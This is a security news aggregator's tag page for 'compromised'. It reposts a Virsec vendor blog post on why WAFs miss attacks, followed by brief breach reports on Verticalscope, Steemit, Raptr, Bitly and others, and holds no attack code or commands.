compromised

now browsing by tag

 
 

#cybersecurity | #hackerspace | Will Your WAF Know When You Are Compromised?

Source: National Cyber Security – Produced By Gregory Evans

In my last blog post “The Existential Crisis of a WAF,” I talked through the consequences of an attack getting through either by a rule not matching, a device misconfiguration, or traffic obfuscation. The latter includes the inability to decrypt and parse the traffic, which was the case with the Equifax breach. I also discussed Trusted Execution™, a new technology that provides huge value over the rule-based network security devices, including:

  1. Protection against Zero-Day attacks
  2. No False Positives = No Tuning and No Learning
  3. Visibility of the full “Kill-Chain”
  4. Blocking action at any phase of the Kill-Chain
  5. Very low Total Cost of Ownership

In this second installment, I thought I would explore the true cost in man-hours of a rule-based network security device, such as the WAF, NG Firewall, IDS/IPS. I am not going to put a number to the below scenario, but instead I want you to think about what the real cost is to you and your organization.

Good Guy Defensive Hacker Training

But first, I want to take a stroll down Memory Lane (no overflows, please…). When I was a young buck in the Air Force, I became an expert at the various IDS and firewall devices that were deployed at the time. One of the firewalls I was managing had several protocol “proxies,” including HTTP that made it capable of understanding the upper layers of the OSI stack web traffic and enforcing a negative security model for that protocol. In this sense, you can say that this firewall was the predecessor to the WAF. This firewall protected the base’s web page, and several employee portals, which was cutting-edge at the time. Every day I would come in and sift through the firewall logs to make sure no big red flags were present. I thought I was so cool, being the only one on base to be able to read the mountains of log entries.

That all changed when I was selected to go to a DOD Unix Security Course, where I was first introduced to the Buffer Overflow exploitations in the Unix finger and sendmail services, which were the exploitations that allowed the famed Morris Worm to be so successful in 1988 (https://en.wikipedia.org/wiki/Morris_worm).

I learned how to think like a hacker: carefully performing target selection, reconnaissance, enumeration, exploitation, and finally ways to cover my tracks. I also learned methods to meticulously lock down the system in order to defend against hacking. To conclude the course, everyone in our training competed in a “Capture the Flag” exercise, which was both exhilarating and enlightening. In the end, I was completely pumped about cybersecurity. Who knew learning hacking techniques would open up new possibilities and turn my professional world upside down?! Sure, in the past I dabbled in hacking, but that was more with services like SMTP and FTP, and rudimentary password cracking. Slackware Linux was just gaining popularity as a free Unix-ish Operating System you can use for hacking, so serious hacking was restricted to licensed Unix and Solaris systems, which was cost prohibitive to the novice.

As Awareness Increases, a Scarier Reality Emerges

Knowing more also had its challenges. When I got back into my daily job reviewing firewall logs, I started to ask the tough “What If” questions: What if I messed up the firewall and exposed us? What if an attack got through? What if there is a hacker in our systems RIGHT NOW??? I could get court-martialed for incompetence! Shortly after my Unix Security training, the Air Force decided to classify all Information Systems as Weapon Systems. This meant that now we had to perform an extensive security audit, classification, and readiness accreditation of every IT system on base. I had to draft the contingency plans to cover the possibility of a compromised system. That led to an extremely important question – perhaps the most important question a security guy can ask:

“If we were compromised, how would I know?”

How Do You Know If Your Network Is Compromised?

Fast-forward to today, and guess what? That question is still a very valid one – How do you know if you are compromised? If you manage ANY security product, the one fact you have to accept is that you don’t know what you don’t know. Meaning, if an attack is not recognized by your security device for any of the reasons mentioned at the beginning of this post, can you prove that you were (or weren’t) compromised?

Consider this scenario: If I create a script to scan for all 34 documented CVEs that are related to Nginx web server https://www.cvedetails.com/vendor/10048/Nginx.html (assuming each of them can be tested from the network), and I slip in one or two Zero-Day tests that actually get through (Yay Me!), for a single IP address targeted, what count of WAF alerts will you have? IDS alerts? Firewall alerts?

Thankfully, you may have a SIEM that gives you a grand total of 153 alerts (a completely arbitrary number) for the total count of devices in the path, including that shiny new RASP you just installed on the targeted server. Now what? What is the contingency plan to make sure every security device did its job and blocked the 34 attacks? Or is it 36? Or is it 100? Do you really know???

It just so happens that attack number 35 was a file-less buffer-overflow that was not yet released to the public, and I now own the box with at least the privileges of the Nginx process. (Inquire about our Nginx Attack Demo.) I am now “living off the land” until I am discovered. This period is called Dwell Time, and the clock is ticking until I am discovered, so I have to work fast to secure the beachhead and cover my tracks. I am thinking to myself that I generated enough “noise” with the other attacks, I am keeping you (the Security Administrator) busy trying to figure out what just happened. Chances are good you won’t find out I’m in your network for awhile.

Choose Between Blind Action or No Action?

So, now what? What is your course of action if you think an attack may have happened but you’re not sure? Without the sufficient evidence that the breach attempt was successful, can you request that the server be quarantined? How long will it take to sift through all the alerts and document the attack to give enough compelling evidence to justify disrupting business? Can the server just be replaced with a known-good image? What is the real cost of reacting to an attack? Or of not reacting? AND will you always react this way EVERY SINGLE TIME you see a flutter of alerts coming from an opportunistic web scanner?

20/20 Virsec Vision

I now have to ask another “What If” question: What if you had a tool in your toolbox that showed exactly what did, or did not happen to that Nginx web server? What if you could open up the Virsec UI and see that an attack got through the network, but Virsec did its job and killed the offensive spawned process? Virsec’s Trusted Execution technology detected the buffer overflow, saw the Nginx process jump from an authorized memory location to an unauthorized memory location, then triggered a Micro-Protection action that killed the offending Process ID, returning the application to smooth operation. No guesswork, no forensics, no quarantining, just a copasetic server humming along, serving out its share of inconvenienced electrons in the form of web pages.

Virsec In Action

In the example below, the Virsec system is in monitoring mode so we can see the entire Kill Chain of the attack. Starting from the bottom line, working up, it starts with a Buffer Overflow , where the system detects a jump to a memory location that is not intended by the application. We then see hostname executed, following by a wget that creates a file, modifies it, then deletes it.

Usually Buffer Overflow attacks are extremely hard to detect with conventional security products, but Virsec would have killed the offending process at the first alert, thereby stopping attackers in their tracks.

The result? You cut costs in the form of staff-hours, prove value in defending the network, and safeguard your customer’s data from being stolen. You become the hero and they place a bronze statue of you down in the lobby. Your next stop? CISO!

I hope you enjoyed this post, and for those of you who are maintaining industry certifications, don’t forget to put in for your CPEs when you read any of our blog posts. Cheers!

Further resources:

The Existential Crisis of a WAF

Making Applications Truly Self Defending: Nine Ways That Virsec Fills Gaps in RASP Security to Deliver Full Stack Application Security Self Defense

 

The post Will Your WAF Know When You Are Compromised? appeared first on Virsec Systems.

*** This is a Security Bloggers Network syndicated blog from Blog – Virsec Systems authored by Mark Pelkoski. Read the original post at: https://virsec.com/will-your-waf-know-when-you-are-compromised/

Source link

The post #cybersecurity | #hackerspace |<p> Will Your WAF Know When You Are Compromised? <p> appeared first on National Cyber Security.

View full post on National Cyber Security

#cyberfraud | #cybercriminals | How compromised emails enable cybercrime and real estate scams — Quartz

Source: National Cyber Security – Produced By Gregory Evans The CEO of an unidentified Swiss company was scammed out of nearly $1 million by a multinational fraud ring, according to a criminal complaint unsealed last week in federal court. The executive, who is identified in the filing only as “S.K.,” was in the process of […] View full post on AmIHackerProof.com

Verticalscope #hacked again: At least 2.7 million #accounts #compromised in second major #data #breach

Source: National Cyber Security – Produced By Gregory Evans

Verticalscope #hacked again: At least 2.7 million #accounts #compromised in second major #data #breach

Hackers have once again targeted Verticalscope, a Canadian firm that manages hundreds of popular web discussion forums with over 45 million user accounts. The breach has compromised at least 2.7 million user accounts. The Toronto-based company runs a network of support forums and online community websites catering to a wide range of interests, from outdoor and automotive to sports and technology.

In June 2016, Verticalscope admitted that it had suffered a data breach that saw at least 45 million user accounts compromised and their data leaked in a blog post on Leakedsource.com.

The latest breach impacted six websites, including Toyotanation.comJeepforum.com – the company’s second-most popular website – and Watchuseek.com, security expert Brian Krebs first reported.

Security researcher and founder of Hold Security, Alex Holden, notified Krebs last week that hackers were selling access to Verticalscope.com and a number of other sites operated by the company.

Holden initially suspected that a nefarious actor was just trying to resell data stolen in the 2016 breach.

“That was before he contacted one of the hackers selling the data and was given screen shots indicating that Verticalscope.com and several other properties were in fact compromised with a backdoor known as a ‘Web shell’,” Krebs wrote. “With a Web shell installed on a site, anyone can remotely administer the site, upload and delete content at will, or dump entire databases of information — such as usernames, passwords, email addresses and Internet addresses associated with each account.”

The hackers reportedly obfuscated certain details in the screenshots that allowed him to locate at least two backdoors on Verticalscope’s website and Toyotanation.com, one of the company’s most popular forums.

Krebs reported that a simple search on one of Verticalscope’s compromised domains led to a series of Pastebin posts that have since been deleted “suggesting that the individual(s) responsible for this hack may be trying to use it to advertise a legally dicey new online service called LuiDB”.

“Similar to Leakedsource, LuiDB allows registered users to search for account details associated with any data element compromised in a breach — such as login, password, email, first/last name and Internet address,” Krebs noted. “The first search is free, but viewing results requires purchasing a subscription for between $5 and $400 in Bitcoin.”

“The intrusion granted access to each individual website files,” Verticalscope said in a statement to Krebs. “Out of an abundance of caution, we have removed the file manager, expired all passwords on the 6 websites in question, added the malicious file pattern and attack vector to our detection tools, and taken additional steps to lock down access.”

The company did not provide any details regarding when and how the attack took place or who carried out the hack. IBTimes UK has reached out to Verticalscope for further details.

The post Verticalscope #hacked again: At least 2.7 million #accounts #compromised in second major #data #breach appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

FICO’s New Fraud Solution Can Detect Compromised Cards Faster

Source: National Cyber Security – Produced By Gregory Evans

FICO’s New Fraud Solution Can Detect Compromised Cards Faster

FICO has announced the launch of FICO Card Compromise Manager, an anti-fraud solution that proactively detects and prioritizes compromised merchants and data breaches or theft involving card data. According to a press release publicizing the news, Card Compromise Manager detects card present, card not present and ATM fraud faster than…

The post FICO’s New Fraud Solution Can Detect Compromised Cards Faster appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

AP police recruitment website compromised by ‘hacking class’

AP1

Source: National Cyber Security – Produced By Gregory Evans

AP police recruitment website compromised by ‘hacking class’

HYDERABAD: The Andhra Pradesh State-Level Police Recruitment Board (APSLPRB), whose tag line is “transparency through technology”, has fallen prey to hackers. The portal is managed in Hyderabad. Three days ahead of accepting online applications (August 3) for filling Stipendiary Cadet Trainee (SCT) constable posts in various wings of AP police department through the newly launched […]

The post AP police recruitment website compromised by ‘hacking class’ appeared first on National Cyber Security.

View full post on National Cyber Security

Blockchain Social Media Steemit Compromised; Investigation Underway

shutterstock_356278754-825x510

Source: National Cyber Security – Produced By Gregory Evans

Blockchain Social Media Steemit Compromised; Investigation Underway

Blockchain-based social media service Steemit today reported that its platform has faced a security breach. The cyber attack, according to CEO Ned Scott, affected over 260 user accounts. As he confirmed further, the platform have also incurred a small loss – worth around $85,000 – in the form of their native cryptocurrencies Steem Dollars and […]

The post Blockchain Social Media Steemit Compromised; Investigation Underway appeared first on National Cyber Security.

View full post on National Cyber Security

He is special guest at the Ground Zero Summit 2015 being organised by Indian Infosec Consortium – a group of ethical hackers. “Threat to national security has moved to the digital dimension. Terrorist organisations have turned social networks and online forums into recruitment hotbeds and propaganda mechanisms. We need a security apparatus in the digital space to address this threat. Hackers are the face of this digital army.” The actor said he is bringing his whole team including scriptwriters of the show to observe and interact with the ethical hacker community. (Also Read: Tabu Has Shown Interest in 24, Says Director ) “From November 22, I will start shooting for 24. It will go on air in 2016. When an actor prepares for a role, we often start to live like the character. Some call it method acting. We meet real life people like the character and try to understand their nuances, their life,” he said. As per the summit’s website, speakers will share details of the espionage mission as well as hold sessions on hacking of cellular networks, medical devices in hospitals, using technical loopholes in them. The consortium claims to have discovered cyber espionage operation under which phones of Indian Army personnel, who had downloaded some mobile application related to news, had been compromised by hackers based in Pakistan. IIC CEO Jiten Jain has said that the findings were handed over to security agencies who promptly acted and sanitised the infected handset early this year.

Source: National Cyber Security – Produced By Gregory Evans

He is special guest at the Ground Zero Summit 2015 being organised by Indian Infosec Consortium – a group of ethical hackers.   “Threat to national security has moved to the digital dimension. Terrorist organisations have turned social networks and online forums into recruitment hotbeds and propaganda mechanisms. We need a security apparatus in the digital space to address this threat. Hackers are the face of this digital army.”   The actor said he is bringing his whole team including scriptwriters of the show to observe and interact with the ethical hacker community. (Also Read: Tabu Has Shown Interest in 24, Says Director )   “From November 22, I will start shooting for 24. It will go on air in 2016. When an actor prepares for a role, we often start to live like the character. Some call it method acting. We meet real life people like the character and try to understand their nuances, their life,” he said.   As per the summit’s website, speakers will share details of the espionage mission as well as hold sessions on hacking of cellular networks, medical devices in hospitals, using technical loopholes in them.   The consortium claims to have discovered cyber espionage operation under which phones of Indian Army personnel, who had downloaded some mobile application related to news, had been compromised by hackers based in Pakistan.  IIC CEO Jiten Jain has said that the findings were handed over to security agencies who promptly acted and sanitised the infected handset early this year.

He is special guest at the Ground Zero Summit 2015 being organised by Indian Infosec Consortium – a group of ethical hackers. “Threat to national security has moved to the digital dimension. Terrorist organisations have turned social networks and online forums into recruitment hotbeds and propaganda mechanisms. We need a security apparatus in the digital space to address this threat. Hackers are the face of this digital army.” The actor said he is bringing his whole team including scriptwriters of the show to observe and interact with the ethical hacker community. (Also Read: Tabu Has Shown Interest in 24, Says Director ) “From November 22, I will start shooting for 24. It will go on air in 2016. When an actor prepares for a role, we often start to live like the character. Some call it method acting. We meet real life people like the character and try to understand their nuances, their life,” he said. As per the summit’s website, speakers will share details of the espionage mission as well as hold sessions on hacking of cellular networks, medical devices in hospitals, using technical loopholes in them. The consortium claims to have discovered cyber espionage operation under which phones […]

For more information go to http://www.NationalCyberSecurity.com, http://www. GregoryDEvans.com, http://www.LocatePC.net or http://AmIHackerProof.com

The post He is special guest at the Ground Zero Summit 2015 being organised by Indian Infosec Consortium – a group of ethical hackers. “Threat to national security has moved to the digital dimension. Terrorist organisations have turned social networks and online forums into recruitment hotbeds and propaganda mechanisms. We need a security apparatus in the digital space to address this threat. Hackers are the face of this digital army.” The actor said he is bringing his whole team including scriptwriters of the show to observe and interact with the ethical hacker community. (Also Read: Tabu Has Shown Interest in 24, Says Director ) “From November 22, I will start shooting for 24. It will go on air in 2016. When an actor prepares for a role, we often start to live like the character. Some call it method acting. We meet real life people like the character and try to understand their nuances, their life,” he said. As per the summit’s website, speakers will share details of the espionage mission as well as hold sessions on hacking of cellular networks, medical devices in hospitals, using technical loopholes in them. The consortium claims to have discovered cyber espionage operation under which phones of Indian Army personnel, who had downloaded some mobile application related to news, had been compromised by hackers based in Pakistan. IIC CEO Jiten Jain has said that the findings were handed over to security agencies who promptly acted and sanitised the infected handset early this year. appeared first on National Cyber Security.

View full post on National Cyber Security

Raptr Accounts Hacked, Accounts Compromised

rtr41hk4

Source: National Cyber Security – Produced By Gregory Evans

 Powered by Max Banner Ads It has emerged that gaming service Raptr has become the latest high profile hacking casualty. This follows the 2011 hack of Sony’s PlayStation Network, as well as the more recent DDOS cyber attacks against both PSN and the Microsoft Xbox Live platforms. Raptr has shared few concrete details about how their security was compromised, but users are strongly advised to change their passwords immediately. Emails have been sent out to account holders alerting them to the Raptr hack, as noted by NeoGAF forum member, Yatesl. “I’ve just received an email from Raptr. Some users may use them to aggregate achievements, and they also partner with AMD for their GeForce Experience type program,” he said in a post on the popular gaming message boards. In the email from Raptr, also posted on the official Raptr company website, CEO Dennis Fong details the extent of the hack and urges users to change their passwords immediately, by heading to the Raptr account page. Fong encourages users who share the same Raptr username and password longin information with other services to change login details on those services. “User names, email addresses, password hashes and some first and last names may have been […]

For more information go to http://www.NationalCyberSecurity.com, http://www. GregoryDEvans.com, http://www.LocatePC.net or http://AmIHackerProof.com

The post Raptr Accounts Hacked, Accounts Compromised appeared first on National Cyber Security.

View full post on National Cyber Security

Bitly website hacked, accounts credentials compromised

Bitly(bit.ly), the Popular URL shortening service, has issued an urgent security warning about a security breach that exposed account’s credentials. The company says they found no evidence suggesting that any accounts have been accessed by the intruders. Read More….

For more information go to http://www.NationalCyberSecurity.com, http://www. GregoryDEvans.com, http://www.LocatePC.net or http://AmIHackerProof.com

The post Bitly website hacked, accounts credentials compromised appeared first on National Cyber Security.

View full post on National Cyber Security